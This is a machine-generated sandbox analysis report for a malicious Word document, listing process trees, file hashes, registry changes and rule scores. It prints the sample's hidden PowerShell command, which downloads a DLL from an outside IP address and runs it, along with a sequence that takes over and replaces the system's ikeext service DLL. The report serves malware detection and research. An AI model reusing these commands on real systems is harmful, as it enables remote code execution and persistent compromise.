VMRay Analyzer Report for Sample #19550 VMRay Analyzer 2.2.0 URI 127.0.0.1 Resolved_To Address 127.0.0.1 Process 1 2444 winword.exe 1560 winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\program files\microsoft office\office15\winword.exe Child_Of Process 2 2616 cmd.exe 2444 cmd.exe c:\Windows\System32\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Process 3 2640 powershell.exe 2616 powershell.exe powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll');rundll32.exe 'C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll' HOK C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Wrote_To Wrote_To Opened Opened Opened Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Process 4 2788 rundll32.exe 2640 rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\rundll32.exe Child_Of Child_Of Created Created Deleted Opened Opened Opened Modified_Properties_Of Deleted Process 5 2900 dllhost.exe 600 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9} C:\Windows\system32\ c:\windows\system32\dllhost.exe Child_Of Process 6 2932 rundll32.exe 2900 rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS C:\Windows\system32\ c:\windows\system32\rundll32.exe Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Created Moved Created Created Created Created Opened Opened Opened Process 7 2940 cmd.exe 2932 cmd.exe C:\Windows\system32\cmd.exe /c "net stop /y ikeext" C:\Windows\system32\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Opened Process 8 2960 net.exe 2940 net.exe net stop /y ikeext C:\Windows\system32\ c:\windows\system32\net.exe Child_Of Process 9 2968 net1.exe 2960 net1.exe C:\Windows\system32\net1 stop /y ikeext C:\Windows\system32\ c:\windows\system32\net1.exe Wrote_To Opened Process 10 2976 cmd.exe 2932 cmd.exe C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll" C:\Windows\system32\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Opened Process 11 2996 takeown.exe 2976 takeown.exe takeown /F C:\Windows\system32\ikeext.dll C:\Windows\system32\ c:\windows\system32\takeown.exe Process 12 3008 cmd.exe 2932 cmd.exe C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F" C:\Windows\system32\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Opened Process 13 3028 icacls.exe 3008 icacls.exe icacls C:\Windows\system32\ikeext.dll /grant system:F C:\Windows\system32\ c:\windows\system32\icacls.exe Process 14 3040 cmd.exe 2932 cmd.exe C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F" C:\Windows\system32\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Opened Process 15 3060 icacls.exe 3040 icacls.exe icacls C:\Windows\system32\ikeext.dll /grant administrators:F C:\Windows\system32\ c:\windows\system32\icacls.exe Process 16 3072 cmd.exe 2932 cmd.exe C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto" C:\Windows\system32\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Opened Process 17 3092 sc.exe 3072 sc.exe sc config ikeext start= auto C:\Windows\system32\ c:\windows\system32\sc.exe Wrote_To Process 18 3104 cmd.exe 2932 cmd.exe C:\Windows\system32\cmd.exe /c "net start ikeext" C:\Windows\system32\ c:\windows\system32\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Opened Process 19 3124 net.exe 3104 net.exe net start ikeext C:\Windows\system32\ c:\windows\system32\net.exe Child_Of Process 20 3132 net1.exe 3124 net1.exe C:\Windows\system32\net1 start ikeext C:\Windows\system32\ c:\windows\system32\net1.exe Child_Of Child_Of Wrote_To Opened Process 21 0 System Idle Process 18446744073709551615 System Idle Process None System Process 22 4 System 18446744073709551615 System None System Process 23 3268 cmd.exe 2788 cmd.exe cmd /c ""C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat" " C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\cmd.exe Child_Of Child_Of Child_Of Created Read_From Created Deleted Wrote_To Wrote_To Opened Opened Opened Opened Process 24 3296 attrib.exe 3268 attrib.exe ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll" C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\attrib.exe Process 25 3304 ping.exe 3268 ping.exe Ping 127.0.0.1 -n 3 C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\ping.exe Wrote_To Opened Process 26 3332 cmd.exe 3268 cmd.exe cmd.exe /c exit C:\Users\BGC6u8Oy yXGxkR\Desktop\ c:\windows\system32\cmd.exe Opened Opened Opened Opened Opened Opened File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework\v2.0.50727\config\machine.config windows\microsoft.net\framework\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config config File conin$ File users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll c:\ c:\users\bgc6u8oy yxgxkr\appdata\local\tempdebug.dll dll MD5 64b2ac701a0d67da134e13b2efc46900 SHA1 1bb516d70591a5a0eb55ee71f9f38597f3640b14 SHA256 f3f55c3df39b85d934121355bed439b53501f996e9b39d4abed14c7fe8081d92 File conout$ File STD_INPUT_HANDLE File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB SocketAddress 213.183.51.187 80 TCP NetworkSocket 213.183.51.187 80 TCP Contains SocketAddress 213.183.51.187 80 NetworkConnection HTTP 213.183.51.187 80 URI 213.183.51.187/debug.dll Contains URI None File users\bgc6u8~1\appdata\local\temp\iun4816.bat users\bgc6u8~1\appdata\local\temp\iun4816.bat c:\ c:\users\bgc6u8~1\appdata\local\temp\iun4816.bat bat MD5 9cc8f01a19e5c00ef42c554b2aef38fd SHA1 ac464faa791113edc96cc061835dcf5b698d5b01 SHA256 f7a647b095d8948d42f34958dc73fc9ca569399d81251336a59a1a3dcb6fe908 File users\bgc6u8~1\appdata\local\temp\iun4816.tmp users\bgc6u8~1\appdata\local\temp\iun4816.tmp c:\ c:\users\bgc6u8~1\appdata\local\temp\iun4816.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat HKEY_CURRENT_USER szDisplayName CutBat REG_SZ UninstallString C:\Windows\system32\rundll32.exe C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS REG_SZ WinRegistryKey Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat HKEY_CURRENT_USER File windows\system32\ikeext32.dll windows\system32\ikeext32.dll c:\ c:\windows\system32\ikeext32.dll dll MD5 f95622f161474511b8d80d6b093aa610 SHA1 691848e306566c63f5dfe1edcca7c7e8882c4caa SHA256 f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26 Moved_To File windows\system32\ikeext.dll windows\system32\ikeext.dll c:\ c:\windows\system32\ikeext.dll dll MD5 c3217cf9789f2b7a41f8ce54692d18fd SHA1 f5bc9b2373201b214b3d0d248c95716023bc0c14 SHA256 f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de Moved_From File windows\system32\sensr9.dat windows\system32\sensr9.dat c:\ c:\windows\system32\sensr9.dat dat MD5 422a9797a40f1b1c3a72e9674adffedb SHA1 92e351c5e1cc5abc36fb003b435acbc018253f56 SHA256 e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac File windows\system32\sensr3.dat windows\system32\sensr3.dat c:\ c:\windows\system32\sensr3.dat dat MD5 6317421e5b20c3df65bf66b4ec472187 SHA1 c6ed48d2daf396178b1840a1877532c429d85cd0 SHA256 2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1 File windows\system32\kernel32.dll windows\system32\kernel32.dll c:\ c:\windows\system32\kernel32.dll dll File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck DisableUNCCheck DisableUNCCheck File STD_ERROR_HANDLE File STD_OUTPUT_HANDLE File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck DisableUNCCheck File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck File STD_OUTPUT_HANDLE File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE File STD_INPUT_HANDLE File users\bgc6u8~1\appdata\local\temp\iun4816.bat users\bgc6u8~1\appdata\local\temp\iun4816.bat c:\ c:\users\bgc6u8~1\appdata\local\temp\iun4816.bat bat File users\bgc6u8~1\appdata\local\tempdebug.dll users\bgc6u8~1\appdata\local\tempdebug.dll c:\ c:\users\bgc6u8~1\appdata\local\tempdebug.dll dll File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck File STD_OUTPUT_HANDLE WinRegistryKey SYSTEM\CurrentControlSet\Services\Tcpip\Parameters HKEY_LOCAL_MACHINE DefaultTTL File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE Analyzed Sample #19550 Malware Artifacts 19550 Sample-ID: #19550 Job-ID: #10929 This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #19550 Submission-ID: #19697 C:\Users\BGC6u8Oy yXGxkR\Desktop\exaai.doc doc MD5 292843976600e8ad2130224d70356bfc SHA1 31bad7ea8606e3e6d98692fa9f4b3f18ebb3c809 SHA256 d5c27308f50a9c6d8ccd01269ca09a7a13e1615945b8047c4e55c610718e317e Opened_By Metadata of Analysis for Job-ID #10929 Timeout False x86 32-bit PAE 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1) win7_32_sp1-mso2013 True 136.962 Windows 7 This is a property collection for additional information of VMRay analysis VMRay Analyzer Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\rundll32.exe" C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll HOK". Create process File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "C:\Windows\system32\sensr9.dat" in the OS directory. Modify operating system directory Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe /c "net stop /y ikeext"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\net.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\takeown.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\icacls.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant administrators:F"". Create process File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "C:\Windows\system32\ikeext32.dll" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "C:\Windows\system32\sensr3.dat" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_create_file_in_os_dir Create file "C:\Windows\system32\ikeext.dll" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_overwrite_file_in_os_dir Modify file "C:\Windows\system32\sensr3.dat" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_overwrite_file_in_os_dir Modify file "C:\Windows\system32\ikeext.dll" in the OS directory. Modify operating system directory File System VTI rule match with VTI rule score 5/5 vmray_overwrite_file_in_os_dir Modify file "C:\Windows\system32\sensr9.dat" in the OS directory. Modify operating system directory Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe /c "sc config ikeext start= auto"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\sc.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe /c "net start ikeext"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\attrib.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\PING.EXE". Create process Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "127.0.0.1". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe". Create process